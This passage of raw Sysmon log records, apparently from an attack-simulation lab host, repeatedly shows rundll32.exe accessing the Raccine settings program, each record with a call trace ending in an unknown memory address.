Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123188Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123187Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123186Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123185Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123184Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123183Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123182Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123181Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123180Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123179Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123178Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123177Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123176Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123175Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123174Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123173Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123172Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123171Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123170Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123169Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123168Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123167Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123166Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123165Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123164Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123163Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123162Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123161Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123160Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123159Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123158Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123157Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123156Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123155Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123154Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123153Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123152Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123151Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123150Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123149Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123148Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123147Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123146Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123145Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123144Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123143Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123142Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123141Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123140Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123139Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123138Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123137Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123136Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123135Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123134Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123133Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123132Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123131Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123130Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123129Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123128Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123127Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123126Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123125Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 